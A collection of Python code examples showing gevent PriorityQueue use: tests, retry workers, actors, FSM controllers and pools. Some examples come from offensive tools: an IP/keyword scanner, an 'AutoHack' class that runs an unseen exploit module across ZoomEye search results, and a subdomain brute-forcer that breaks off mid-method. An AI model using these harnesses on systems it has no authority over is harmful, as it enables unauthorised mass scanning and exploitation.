Example #1
def test_priority():
    refund_queue = PriorityQueue()
    receipt = TransferReceipt(sender=123, amount=1, identifier=123, received_timestamp=1)

    # higher priority
    refund1 = Refund(receipt, priority=1, claim_fee=False)
    # lower priority
    refund2 = Refund(receipt, priority=5, claim_fee=False)

    assert refund1 > refund2

    refund_queue.put(refund1)
    refund_queue.put(refund2)

    received_first = refund_queue.get()
    received_second = refund_queue.get()

    assert received_first == refund2
    assert received_second == refund1
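
The dequeue order asserted above is driven entirely by how Refund objects compare: a PriorityQueue always pops the item that currently compares smallest, and since refund1 > refund2, refund2 leaves the queue first. A minimal sketch of that mechanic (the Item class below is invented for illustration and is not the project's Refund):

from functools import total_ordering
from gevent.queue import PriorityQueue

@total_ordering
class Item(object):
    def __init__(self, priority):
        self.priority = priority

    def __eq__(self, other):
        return self.priority == other.priority

    def __lt__(self, other):
        # inverted on purpose: a larger priority number compares smaller,
        # so it is dequeued first, matching the test above
        return self.priority > other.priority

q = PriorityQueue()
a, b = Item(1), Item(5)
assert a > b            # the same relation the test asserts for refund1/refund2
q.put(a)
q.put(b)
assert q.get() is b     # priority=5 dequeues first, as in the test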
Example #2
    def test_add_to_retry_queue(self, mocked_logger):
        retry_items_queue = PriorityQueue()
        worker = AgreementWorker(config_dict=self.worker_config,
                                 retry_resource_items_queue=retry_items_queue)
        resource_item = {'id': uuid.uuid4().hex}
        priority = 1000
        self.assertEqual(retry_items_queue.qsize(), 0)

        # Add to retry_resource_items_queue
        worker.add_to_retry_queue(resource_item, priority=priority)

        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item = retry_items_queue.get()
        self.assertEqual((priority, retry_resource_item),
                         (1001, resource_item))

        resource_item = {'id': 0}
        # Add to retry_resource_items_queue with status_code '429'
        worker.add_to_retry_queue(resource_item, priority, status_code=429)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item = retry_items_queue.get()
        self.assertEqual((priority, retry_resource_item),
                         (1001, resource_item))

        priority = 1002
        worker.add_to_retry_queue(resource_item, priority=priority)
        sleep(worker.config['retry_default_timeout'] * 2)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item = retry_items_queue.get()
        self.assertEqual((priority, retry_resource_item),
                         (1003, resource_item))

        worker.add_to_retry_queue(resource_item, priority=priority)
        self.assertEqual(retry_items_queue.qsize(), 0)
        mocked_logger.critical.assert_called_once_with(
            'Tender {} reached limit retries count {} and droped from '
            'retry_queue.'.format(resource_item['id'],
                                  worker.config['retries_count']),
            extra={
                'MESSAGE_ID': 'dropped_documents',
                'JOURNAL_TENDER_ID': resource_item['id']
            })
        del worker
Example #3
    def test_add_to_retry_queue(self, mocked_logger):
        retry_items_queue = PriorityQueue()
        worker = ResourceItemWorker(
            config_dict=self.worker_config,
            retry_resource_items_queue=retry_items_queue)
        resource_item_id = uuid.uuid4().hex
        priority = 1000
        self.assertEqual(retry_items_queue.qsize(), 0)

        # Add to retry_resource_items_queue
        worker.add_to_retry_queue(resource_item_id, priority=priority)
        # sleep(worker.config['retry_default_timeout'] * 0)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item_id = retry_items_queue.get()
        self.assertEqual(priority, 1001)
        self.assertEqual(retry_resource_item_id, resource_item_id)

        # Add to retry_resource_items_queue with status_code '429'
        worker.add_to_retry_queue(resource_item_id, priority, status_code=429)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item_id = retry_items_queue.get()
        self.assertEqual(priority, 1001)
        self.assertEqual(retry_resource_item_id, resource_item_id)

        priority = 1002
        worker.add_to_retry_queue(resource_item_id, priority=priority)
        sleep(worker.config['retry_default_timeout'] * 2)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item_id = retry_items_queue.get()
        self.assertEqual(priority, 1003)
        self.assertEqual(retry_resource_item_id, resource_item_id)

        worker.add_to_retry_queue(resource_item_id, priority=priority)
        self.assertEqual(retry_items_queue.qsize(), 0)
        mocked_logger.critical.assert_called_once_with(
            'Tender {} reached limit retries count {} and droped from '
            'retry_queue.'.format(resource_item_id,
                                  worker.config['retries_count']),
            extra={'MESSAGE_ID': 'dropped_documents'})
        del worker
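
A hedged reconstruction of the behaviour these two tests encode, pieced together from the assertions alone and not taken from the projects' actual code: an ordinary retry bumps the priority number by one, a 429 response requeues at the same priority, the requeue is delayed in proportion to the retry count, and once the count exceeds config['retries_count'] the item is dropped with a critical log entry instead of being requeued.

import gevent

def add_to_retry_queue(self, item, priority=0, status_code=None):
    if status_code != 429:
        priority += 1              # an ordinary retry raises the priority number
    retries = priority - 1000      # assumption: priorities start at 1000, as above
    if retries > self.config['retries_count']:
        # the real code emits the logger.critical(...) call the tests assert on
        self.log_dropped(item)     # hypothetical helper
        return
    delay = self.config['retry_default_timeout'] * (retries - 1)
    if delay > 0:
        gevent.spawn_later(delay, self.retry_resource_items_queue.put,
                           (priority, item))
    else:
        self.retry_resource_items_queue.put((priority, item))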
Example #4
class HttpTest(object):

    def __init__(self, host, keyword, ips, timeout):
        self.threads = 100
        self.queue = PriorityQueue()
        self.host = host
        self.keyword = keyword
        self.result = []
        for ip in ips:
            self.queue.put(ip)
        self.num = self.queue.qsize()
        self.i = 0
        self.success = 0
        self.timeout = timeout
        self.filename = os.path.join(rootPath,"result",host + ".log")
        self.outfile = open(self.filename, 'w')


    def _scan(self,j):
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=3.0)
                if config.HTTPS_Support:
                    host, domain, port = item, self.host, 443
                else:
                    host, domain, port = item, self.host, 80
                html = httpServer((host, domain, port), self.timeout)
                if html is not None and self.keyword in html:
                    self.outfile.write(item + '\n')
                    self.outfile.flush()
                    self.success += 1
            except:
                pass
            finally:
                self.i += 1
                msg = '[*] %s found, %s scanned, %s groups left' % (self.success, self.i, self.num - self.i)
                print_msg(msg)
            time.sleep(1.0)

    def run(self):
        threads = [gevent.spawn(self._scan, i) for i in range(self.threads)]
        gevent.joinall(threads)

        msg = '[+] All Done. Success:%d Saved in:%s' % (self.success, self.filename)
        print_msg(msg, line_feed=True)
Example #5
class AutoHack(object):
    def __init__(self, zoomeye_results, threads_num):
        self.threads_num = threads_num
        self.targets = PriorityQueue()
        self.zoomeye_results = zoomeye_results
        self.result = []
        
        for zoomeye_result in zoomeye_results:
            self.targets.put(zoomeye_result)
        self.total = self.targets.qsize()
        self.pbar = tqdm(total=self.total, ascii=True)


    def check(self):
        while self.targets.qsize() > 0:
            # note: get() can block forever if another greenlet empties the
            # queue between the qsize() check and the get() call
            target = self.targets.get().strip()
            try:
                self.pbar.update(1)
                result = exp.exp(target)
                if result:
                    self.result.append(result)
            except Exception as e:
                #print(e)
                pass


    def run(self):
        threads = [gevent.spawn(self.check) for i in range(self.threads_num)]
        try:
            gevent.joinall(threads)
        except KeyboardInterrupt as e:
            print ('[WARNING] User aborted')
            for res in self.result:
                print (res)
        self.pbar.close()
        print ("Hack it!")
        for res in self.result:
            print (res)
        print("Found ",len(self.result))
        print ("End!")
Example #6
class _Channel(object):
    def __init__(self, from_fsm, to_fsm, tracer, queue=None):
        if queue is None:
            self.queue = PriorityQueue()
        else:
            self.queue = queue
        self.from_fsm = from_fsm
        self.to_fsm = to_fsm
        self.tracer = tracer

    def put(self, priority_order_item):
        priority, order, item = priority_order_item
        self.tracer.send_trace_message(
            messages.ChannelTrace(
                self.tracer.trace_order_seq(),
                self.from_fsm.fsm_id if self.from_fsm else None,
                self.to_fsm.fsm_id if self.to_fsm else None, item.name))
        self.queue.put(priority_order_item)

    def get(self, block=True, timeout=None):
        return self.queue.get(block, timeout)

    receive = get
Example #7
class Actor(Greenlet):
    """Simple implementation of the Actor pattern
    """

    def __init__(self):
        self.inbox = PriorityQueue()
        self._handlers = {ShutdownRequest: self.receive_shutdown}
        Greenlet.__init__(self)

    def receive(self, msg):
        """Dispatch a received message to the appropriate type handler
        """
        #log.debug("Received a message: " + repr(msg))
        cls = msg.__class__
        if cls in self._handlers:
            self._handlers[cls](msg)
        else:
            raise NotImplementedError()

    def receive_shutdown(self, msg):
        self.running = False

    def send(self, msg, priority=50):
        """Place a message into the actor's inbox
        """
        self.inbox.put((priority, msg))

    def _run(self):
        """Run the Actor in a blocking event loop
        """
        self.running = True

        while self.running:
            prio, msg = self.inbox.get()
            self.receive(msg)
            del msg
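
A hedged usage sketch: Pinger and PingRequest are invented here, and ShutdownRequest is assumed to be a plain message class importable from the same module as Actor.

class PingRequest(object):
    pass

class Pinger(Actor):
    def __init__(self):
        Actor.__init__(self)
        # register a handler for our own message type
        self._handlers[PingRequest] = self.receive_ping

    def receive_ping(self, msg):
        print("pong")

actor = Pinger()
actor.start()                           # Greenlet.start() schedules _run()
actor.send(PingRequest(), priority=10)  # smaller number = delivered first
actor.send(ShutdownRequest())           # default priority 50, handled last
actor.join()

Note that two messages with equal priority would fall back to comparing the message objects themselves, which raises TypeError on Python 3; distinct priorities avoid that.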
Example #8
class ZMQEventChannel(object):

    def __init__(self, fsm_registry, connector_registry, configuration):
        self.fsm_registry = fsm_registry
        self.connector_registry = connector_registry
        self.context = zmq.Context.instance()
        self.socket = self.context.socket(zmq.ROUTER)
        if 'bind_port' in configuration:
            self.socket_port = configuration.get('bind_port')
            self.socket.bind('tcp://{0}:{1}'.format(configuration.get('bind_address', '127.0.0.1'),
                                                    self.socket_port))
        else:
            self.socket_port = self.socket.bind_to_random_port('tcp://{0}'.format(configuration.get('bind_address', '127.0.0.1')))
        logger.info('starting zmq_thread')
        self.zmq_thread = gevent.spawn(self.receive_external_messages)
        self.inbox_thread = gevent.spawn(self.receive_internal_messages)
        self.inbox = PriorityQueue()
        self.message_id_seq = count(0)
        self.client_id_seq = count(0)
        self.clients = dict()

    def receive_internal_messages(self):
        while True:
            gevent.sleep(0.1)
            logger.info("Waiting for messages")
            priority, order, message = self.inbox.get()
            message_type = message.name
            logger.info('Received %s', message_type)
            if 'client_id' in message.data and message.data['client_id'] in self.clients:
                # Unicast
                logger.info("Unicasting message to %s aka %r", message.data['client_id'], self.clients[message.data['client_id']])
                msg = [self.clients[message.data['client_id']]]
                msg.extend(messages.serialize(message))
                self.socket.send_multipart(msg)
            else:
                # Broadcast
                logger.info("Broadcasting message to all listening clients")
                for zmq_client_id in list(self.clients.values()):
                    msg = [zmq_client_id]
                    msg.extend(messages.serialize(message))
                    self.socket.send_multipart(msg)

    def receive_external_messages(self):
        while True:
            to_fsm_id = None
            from_fsm_id = None
            zmq_client_id = None
            logger.info('waiting on recv_multipart')
            message = self.socket.recv_multipart()
            logger.info(repr(message))
            zmq_client_id = message.pop(0)
            client_id = str(next(self.client_id_seq))
            self.clients[client_id] = zmq_client_id
            try:
                msg_type = message.pop(0).decode()
                msg_data = yaml.safe_load(message.pop(0).decode())
                if b'Listening' in message:
                    msg_data['data']['client_id'] = client_id
                logger.info(repr(msg_type))
                logger.info(repr(msg_data))
            except Exception as e:
                self.socket.send_multipart([zmq_client_id, b'Error'])
                logger.error(str(e))
                continue
            if not isinstance(msg_type, str):
                self.socket.send_multipart([zmq_client_id, 'Element 1 should be str was {}'.format(type(msg_type)).encode()])
                logger.error([zmq_client_id, 'Element 1 should be str was {}'.format(type(msg_type)).encode()])
                continue
            if not isinstance(msg_data, dict):
                self.socket.send_multipart([zmq_client_id, 'Element 2 should be a dict was {}'.format(type(msg_data)).encode()])
                logger.error([zmq_client_id, 'Element 2 should be a dict was {}'.format(type(msg_data)).encode()])
                continue
            to_fsm_id = msg_data.get('to_fsm_id', None)
            from_fsm_id = msg_data.get('from_fsm_id', None)
            if not from_fsm_id:
                from_fsm_id = 'zmq'
            if to_fsm_id in self.fsm_registry:
                logger.info('Sending to FSM {} from {}'.format(to_fsm_id, from_fsm_id))
                self.fsm_registry[to_fsm_id].inbox.put((1,
                                                        next(self.fsm_registry[to_fsm_id].message_id_seq),
                                                        messages.Event(from_fsm_id,
                                                                       to_fsm_id,
                                                                       msg_data['name'],
                                                                       msg_data['data'])))

                logger.info('Processed')
                self.socket.send_multipart([zmq_client_id, b'Processed'])
            else:
                logger.info('Not processed')
                self.socket.send_multipart([zmq_client_id, b'Not processed'])
            gevent.sleep(0)
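
A hedged sketch of a client for the wire format the ROUTER loop above expects: frame one is a message-type string, frame two a YAML document carrying to_fsm_id, name and data. The port and fsm id below are invented for illustration.

import zmq
import yaml

context = zmq.Context.instance()
socket = context.socket(zmq.DEALER)   # DEALER pairs with the ROUTER above
socket.connect('tcp://127.0.0.1:5555')

payload = {'to_fsm_id': 'fsm1', 'name': 'Start', 'data': {}}
socket.send_multipart([b'Event', yaml.safe_dump(payload).encode()])
print(socket.recv_multipart())        # [b'Processed'] or [b'Not processed']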
Example #9
class FactoryPool(object):
    def __init__(self, factory, maxsize=200, timeout=60):
        self.factory = factory
        self.maxsize = maxsize
        self.timeout = timeout
        self.clients = PriorityQueue(maxsize)
        # If there is a maxsize, prime the queue with empty slots.
        if maxsize is not None:
            for _ in xrange(maxsize):
                self.clients.put(EMPTY_SLOT)

    @contextlib.contextmanager
    def reserve(self):
        """Context-manager to obtain a Client object from the pool."""
        ts, client = self._checkout_connection()
        try:
            yield client
        finally:
            self._checkin_connection(ts, client)

    def _checkout_connection(self):
        # If there's no maxsize, no need to block waiting for a connection.
        blocking = self.maxsize is not None

        # Loop until we get a non-stale connection, or we create a new one.
        while True:
            try:
                ts, client = self.clients.get(blocking)
            except Empty:
                # No maxsize and no free connections, create a new one.
                # XXX TODO: we should be using a monotonic clock here.
                # see http://www.python.org/dev/peps/pep-0418/
                now = int(time.time())
                return now, self.factory()
            else:
                now = int(time.time())
                # If we got an empty slot placeholder, create a new connection.
                if client is None:
                    return now, self.factory()
                # If the connection is not stale, go ahead and use it.
                if ts + self.timeout > now:
                    return ts, client
                # Otherwise, the connection is stale.
                # Close it, push an empty slot onto the queue, and retry.
                if hasattr(client, 'disconnect'):
                    client.disconnect()

                self.clients.put(EMPTY_SLOT)
                continue

    def _checkin_connection(self, ts, client):
        """Return a connection to the pool."""
        if hasattr(client, '_closed') and client._closed:
            self.clients.put(EMPTY_SLOT)
            return

        # If the connection is now stale, don't return it to the pool.
        # Push an empty slot instead so that it will be refreshed when needed.
        now = int(time.time())
        if ts + self.timeout > now:
            self.clients.put((ts, client))
        else:
            if self.maxsize is not None:
                self.clients.put(EMPTY_SLOT)
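
EMPTY_SLOT is not shown above; from the `client is None` check it is presumably a (0, None) sentinel pair. A hedged usage sketch, with DummyClient standing in for whatever the factory really builds:

EMPTY_SLOT = (0, None)  # assumed: a primed slot whose client is None

class DummyClient(object):
    """Stand-in for a real client (memcached, redis, ...)."""
    def ping(self):
        return True

pool = FactoryPool(DummyClient, maxsize=10, timeout=30)
with pool.reserve() as client:  # blocks once all 10 slots are checked out
    client.ping()
# on exit, the (checkout timestamp, client) pair is returned to the pool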
Example #10
class PriorityBlockingQueue(object):
    """
    带优先级的阻塞队列。
    优先级数字越小,优先级越高。

    插入元素:
    * put: 向队列尾部插入一个元素,如果该队列已满,则一直阻塞。
    * offer: 向队列尾部插入一个元素,插入成功返回True。插入失败返回False。

    获取元素:
    * poll: 获取并移除队列的头元素,若队列为空,则返回null。
    * take: 获取并移除队列的头元素,若队列为空,则一直阻塞。
    * peek:获取但不移除队列的头元素,若队列为空,则返回null

    队列状态状态:
    * qsize:获取队列中当前元素数量
    * maxsize:获取队列的最大容量
    """
    def __init__(self, maxsize: int = None):
        """
        init
        :param maxsize: 队列的最大容量
        """
        self.__queue = PriorityQueue(maxsize=maxsize)

    def put(self, item, priority: int = 200) -> None:
        """
        向队列尾部插入一个元素,如果该队列已满,则一直阻塞。
        :param item:
        :param priority: 优先级
        :return:
        """
        while True:
            try:
                self.__queue.put(PriorityEntry(priority, item))
                break
            except Exception as e:
                logger.debug("put data failed error -> {0}".format(e))
            time.sleep(0.5)

    def offer(self, item, priority: int = 200) -> bool:
        """
        向队列尾部插入一个元素,插入成功返回True。插入失败返回False。
        :param item: 元素
        :param priority: 优先级
        :return:
        """
        try:
            self.__queue.put(PriorityEntry(priority, item), block=False)
            return True
        except Exception as e:
            logger.debug("offer data failed error -> {0}".format(e))
        return False

    def poll(self):
        """
        获取并移除队列的头元素,若队列为空,则返回null。
        :return:
        """
        try:
            return self.__queue.get(block=False).data
        except Exception as e:
            logger.debug("poll data failed error -> {0}".format(e))
        return None

    def take(self):
        """
        获取并移除队列的头元素,若队列为空,则一直阻塞。
        :return:
        """
        while True:
            try:
                return self.__queue.get().data
            except Exception as e:
                logger.debug("take data failed error -> {0}".format(e))
            time.sleep(0.5)

    def peek(self):
        """
        获取但不移除队列的头元素,若队列为空,则返回null
        :return:
        """
        try:
            return self.__queue.peek(block=False).data
        except Exception as e:
            logger.debug("peek data failed error -> {0}".format(e))
        return None

    def qsize(self) -> int:
        """
        获取队列中当前元素数量
        :return:
        """
        return self.__queue.qsize()

    def maxsize(self) -> int:
        """
        获取队列的最大容量
        :return:
        """
        return self.__queue.maxsize
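
PriorityEntry is referenced above but not shown; a minimal sketch consistent with how it is used (wrap the payload in .data, compare on priority only) might be:

import functools

@functools.total_ordering
class PriorityEntry(object):
    def __init__(self, priority, data):
        self.priority = priority
        self.data = data

    def __eq__(self, other):
        return self.priority == other.priority

    def __lt__(self, other):
        return self.priority < other.priority

q = PriorityBlockingQueue(maxsize=10)
q.put('low', priority=300)
q.put('high', priority=100)
assert q.take() == 'high'  # the smaller number wins, as documented above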
Example #11
# -*- coding: utf-8 -*-
"""
Priority queue test
"""

from gevent.queue import PriorityQueue

tasks = PriorityQueue()

tasks.put((3, '3'))
tasks.put((5, '5'))
tasks.put((1, '1'))

print(tasks.get())  # (1, '1') -- the smallest priority number comes out first
print(tasks.get())  # (3, '3')
print(tasks.get())  # (5, '5')
Example #12
class FSMController(object):
    def __init__(self, name, fsm_id, states, initial_state, tracer,
                 channel_tracer, fsm_registry, fsm_id_seq, inventory,
                 play_header, outputs):
        self.shutting_down = False
        self.is_shutdown = False
        self.fsm_registry = fsm_registry
        self.name = name
        self.fsm_id = fsm_id
        self.tracer = tracer
        self.channel_tracer = channel_tracer
        self.state = initial_state
        self.states = states
        self.inbox = PriorityQueue()
        self.message_buffer = Queue()
        self.self_channel = Channel(self, self, tracer, self.inbox)
        self.worker = AnsibleTaskWorker(tracer, next(fsm_id_seq), inventory,
                                        play_header)
        self.worker_output_queue = Queue()
        self.worker.controller.outboxes['output'] = self.worker_output_queue
        self.worker.queue.put(Inventory(0, inventory))
        self.outboxes = dict(default=None)
        self.last_event = NULL_EVENT
        self.task_id_seq = count(0)
        self.failure_count = 0
        if outputs:
            self.outboxes.update({name: None for name in outputs})
        self.thread = gevent.spawn(self.receive_messages)

    def enter(self):
        self.state.exec_handler(self, 'enter', NULL_EVENT)

    def change_state(self, state, handling_message_type):
        if self.state:
            self.state.exec_handler(self, 'exit', NULL_EVENT)
        if settings.instrumented:
            self.tracer.send_trace_message(
                messages.FSMTrace(self.tracer.trace_order_seq(), self.name,
                                  self.fsm_id, self.state.name, state.name,
                                  handling_message_type))
        self.state = state
        if self.state:
            self.state.exec_handler(self, 'enter', NULL_EVENT)

    def handle_message(self, message_type, message):
        self.state.exec_handler(self, message_type, message)

    def shutdown(self):
        self.shutting_down = True
        if self.is_shutdown:
            return
        self.worker.queue.put(ShutdownRequested())
        for _ in range(10):
            gevent.sleep(1)
            worker_message = self.worker_output_queue.get()
            if isinstance(worker_message, ShutdownComplete):
                break
        self.is_shutdown = True

    def receive_messages(self):

        while not self.shutting_down:
            gevent.sleep(0.1)
            logger.info("Waiting for messages")
            priority, order, message = self.inbox.get()
            if self.shutting_down:
                logger.info("Ignoring message due to shutdown")
                break
            message_type = message.name
            if message_type == 'Shutdown':
                logger.info("Shutting down")
                self.shutdown()
                break
            elif message_type == 'ChangeState' and self.state.name != message.data['current_state']:
                logger.info("Ignoring ChangeState message because the current state does not match")
            elif message_type == 'ChangeState' and self.state.name == message.data['current_state']:
                logger.info("Changing state")
                self.change_state(self.states[message.data['next_state']],
                                  message.data['handling_message_type'])
            else:
                logger.info("Handling message {}".format(message_type))
                self.handle_message(message_type, message)
Example #13
class SubNameBrute:
    def __init__(self, target, options):
        # set up the priority queue
        self.queue = PriorityQueue()
        self.priority = 0

        # basic settings from the given options
        self.target = target.strip()
        self.options = options
        self.ignore_intranet = options.get('ignore_intranet')

        # name the result files after the main domain (or the name given via options)
        outfile_name = options.get('file') if options.get('file') else target

        # append a suffix when the full (large) dictionaries are used
        if self.options.get('subnames_full'):
            outfile_name += '_sfull'
        if self.options.get('next_sub_full'):
            outfile_name += '_nfull'

        self.fname = 'results/' + outfile_name + '.txt'
        self.outfile = open(self.fname, 'wb')
        self.outfile_ips = open('results/' + outfile_name + '_ip.txt', 'w')

        # set up the DNS resolvers (one per configured thread)
        # configure=False skips reading /etc/resolv.conf, so the nameservers can be assigned manually from the validated list
        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.get('threads'))]
        for _ in self.resolvers:
            '''
            dns.resolver.Resolver: http://www.dnspython.org/docs/1.14.0/dns.resolver.Resolver-class.html
            dns.resolver.Resolver.lifetime: The total number of seconds to spend trying to get an answer to the question.
            dns.resolver.Resolver.timeout: The number of seconds to wait for a response from a server, before timing out.
            '''
            # timeout limits the wait on a single server; lifetime caps the whole query
            _.lifetime = _.timeout = 10.0

        # load the list of DNS servers
        self._load_dns_servers()
        # self.ex_resolver is a fallback resolver used when a query raises
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = self.dns_servers
        self.logfile = open('results/'+target+'_log.txt','a')

        # load the subdomain dictionaries
        self._load_next_sub()
        self._load_sub_names()

        # initial counters and state
        self.start_time = time.time()
        self.scan_count = 0
        self.found_count = 0  # prefixes confirmed to exist as subdomains
        self.STOP_ME = False
        self.ip_dict = {}
        self.found_subs = set()

    def _load_dns_servers(self):
        """
        功能:导入可用的名称服务器 (init初始化时执行)
        :return:
        """
        print '[+] Validate DNS servers ...'
        self.dns_servers = []
        pool = Pool(30)
        for server in open('dns_servers.txt').xreadlines():  # xreadlines returns a generator
            server = server.strip()
            if server:
                # apply_async runs the checks in parallel
                pool.apply_async(self._test_server, (server,))  # apply_async(func[, args[, kwds[, callback]]]) is non-blocking
        pool.join()  # block until all the checker tasks have exited
        self.dns_count = len(self.dns_servers)
        sys.stdout.write('\n')
        print '[+] Found %s available DNS Servers in total' % self.dns_count
        if self.dns_count == 0:
            print '[ERROR] No DNS Servers available.'
            sys.exit(-1)

    def _test_server(self, server):
        '''
        Check whether a DNS server is usable (probed while _load_dns_servers() loads the list).
        Approach: 1. an existing domain should resolve to its known IP;
                  2. resolving a non-existent domain should fail.
        :param server: nameserver
        :return: None
        '''
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0
        try:
            resolver.nameservers = [server]
            existed_domain = 'public-dns-a.baidu.com'
            corrs_ip = '180.76.76.76'
            answers = resolver.query(existed_domain)
            if answers[0].address != corrs_ip:
                raise Exception('incorrect DNS response')
            try:
                non_existed_domain = 'test.bad.dns.lijiejie.com'
                resolver.query(non_existed_domain)
                print '[+] Bad DNS Server found %s' % server
            except:
                self.dns_servers.append(server)
            print '[+] Check DNS Server %s < OK >   Found %s' % (server.ljust(16), len(self.dns_servers))
        except:
            print '[+] Check DNS Server %s <Fail>   Found %s' % (server.ljust(16), len(self.dns_servers))


    def _get_filename(self, option, is_full):
        '''
        Build the path of the dictionary file to open.
        param: option: dictionary type, subnames / next_sub
        param: is_full: whether to use the large or the small dictionary
        return: _file: path of the dictionary to load
        '''
        has_newdct = self.options.get('new_dct')
        if has_newdct:
            try:
                # a new dictionary file name was given, so load the new dictionaries
                next_sub,subnames = has_newdct.split(',')
            except Exception:
                print '[ERROR] Names file not exists: %s' % has_newdct
                exit(-1)
            else:
                # the new next_sub,subnames names parsed fine; now check that the files actually exist
                self.new_filenames = {
                    'next_sub':'dict/'+next_sub,
                    'subnames':'dict/'+subnames
                }
                filename = self.new_filenames.get(option)
                if os.path.exists(filename):
                    _file = filename
                else:
                    print '[ERROR] Names file not exists: %s' % filename
                    exit(-1)
        elif is_full:
            _file = 'dict/'+option+'_full.txt'
        else:
            _file = 'dict/'+option+'.txt'

        return _file

    def _load_sub_names(self):

        print '[+] Load sub names ...'
        is_full = self.options.get('subnames_full')
        # _file is the full path of the dictionary
        _file = self._get_filename('subnames',is_full)
        normal_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            wildcard_lines = []
            for line in f.xreadlines():
                sub = line.strip()
                print 'sub:' + sub
                if not sub or sub in lines:
                    continue
                lines.add(sub)
                # wildcards
                # QUESTION: the actual sub files don't seem to contain any wildcards????
                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    # if the line contains a wildcard, record it in wildcard_lines first
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    print 'sub2: ' + sub
                    if sub not in wildcard_list:
                        # the substituted form feeds the regex below, which drops normal lines already covered by a wildcard pattern
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    # lines without wildcards go to normal_lines
                    normal_lines.append(sub)
        pattern = '|'.join(regex_list)
        if pattern:
            _regex = re.compile(pattern)
            if _regex:
                for line in normal_lines[:]:
                    if _regex.search(line):
                        normal_lines.remove(line)

        for item in normal_lines:
            # incrementing priority per item keeps the normal names in their original file order
            self.priority = self.priority+1
            self.queue.put((self.priority, item))

        for item in wildcard_lines:
            # wildcard entries get a huge number, i.e. the lowest priority (larger number = lower priority)
            self.queue.put((88888888, item))

    def _load_next_sub(self):
        """
        枚举一、二位子域并添加已存子域
        :return:
        """
        self.next_subs = []
        _set = set()
        is_full = self.options.get('next_sub_full')
        # _file is the full path of the next_sub dictionary
        _file = self._get_filename('next_sub',is_full)
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in self.next_subs:
                    # combine new substrings from the {alphnum} and other wildcards
                    # QUESTION: aren't the other plain substrings in the original file used?
                    tmp_set = {sub}  # a one-element set; note this is NOT set(sub), which would split the string into characters
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        # print 'item: ' + item
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                            # for _letter in 'ab89':
                                # e.g. for {alphnum}{alphnum}, all pairwise combinations of the 36 characters end up in tmp_set
                                tt = item.replace('{alphnum}', _letter, 1)
                                tmp_set.add(tt)
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace('{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in _set:
                            # once every wildcard has been replaced, the item is added to _set / self.next_subs
                            # plain substrings from the original file (answering the question above) are added to _set and self.next_subs directly
                            _set.add(item)
                            self.next_subs.append(item)


    # check whether an IP is in a private (intranet) range
    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        if ret[0] == '172' and 16 <= int(ret[1]) <= 31:  # 172.16.0.0/12 covers 172.16-172.31
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    def put_item(self, item):
        # add a new subdomain prefix to the pending queue self.queue
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            # entries containing wildcards are pushed far down the priority order
            self.queue.put((self.priority + num * 10000000, item))

    def _universal_parsing(self, sub, ips):
        # bookkeeping used to detect wildcard (universal) DNS resolution
        _sub = sub.split('.')[-1]
        # (_sub, ips): the prefix label together with the IPs its subdomain resolved to
        '''
        For names sharing the same label, e.g. a.b.baidu.com and a.baidu.com, resolving to
        the same A records, other subdomains with that label will likely resolve to the same
        IPs as well -- a sign of wildcard (universal) DNS resolution.
        '''
        if (_sub, ips) not in self.ip_dict:
            self.ip_dict[(_sub, ips)] = 1
        else:
            self.ip_dict[(_sub, ips)] += 1

        # count how many subs resolved to this IP set (one IP set hit by many subs suggests wildcard DNS)
        if ips not in self.ip_dict:
            self.ip_dict[ips] = 1
        else:
            self.ip_dict[ips] += 1

        return self.ip_dict[(_sub, ips)] > 3 or self.ip_dict[ips] > 6

    def _validate_subdomain(self, j, sub):
        '''
        Check whether a subdomain exists.
        '''

        # build the full subdomain name
        subdmname = sub + '.' + self.target

        try:
            answers = self.resolvers[j].query(subdmname)
        except dns.resolver.NoAnswer:
            try:
                # on failure, retry with the fallback resolver
                answers = self.ex_resolver.query(subdmname)
            except dns.resolver.NoAnswer:
                # both attempts failed; treat the name as non-existent
                return False
        if answers:
            # an answer arrived, so record the prefix in self.found_subs
            # QUESTION: shouldn't prefixes proven not to exist be recorded separately?
            self.found_subs.add(sub)
            # join the sorted A records
            ips = ', '.join(sorted([answer.address for answer in answers]))
            print ips
            self.cur_ips = ips
            # the single-IP case where the address is one of the placeholder/blackhole IPs below
            if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                return False
            # filter out intranet names
            # self.ignore_intranet says whether private IPs should be filtered
            # SubNameBrute.is_intranet(answers[0].address) performs the actual check
            # QUESTION: why is only the IP in answers[0] tested???
            if self.ignore_intranet and SubNameBrute.is_intranet(answers[0].address):
                return False
            # wildcard (universal) DNS resolution
            if self._universal_parsing(sub, ips):
                return False
        else:
            return False

        return True

    def _scan_cname(self, j, subdmname):
        '''
        Check whether the subdomain's CNAME is itself a new subdomain, i.e. yields a new prefix.
        '''
        try:
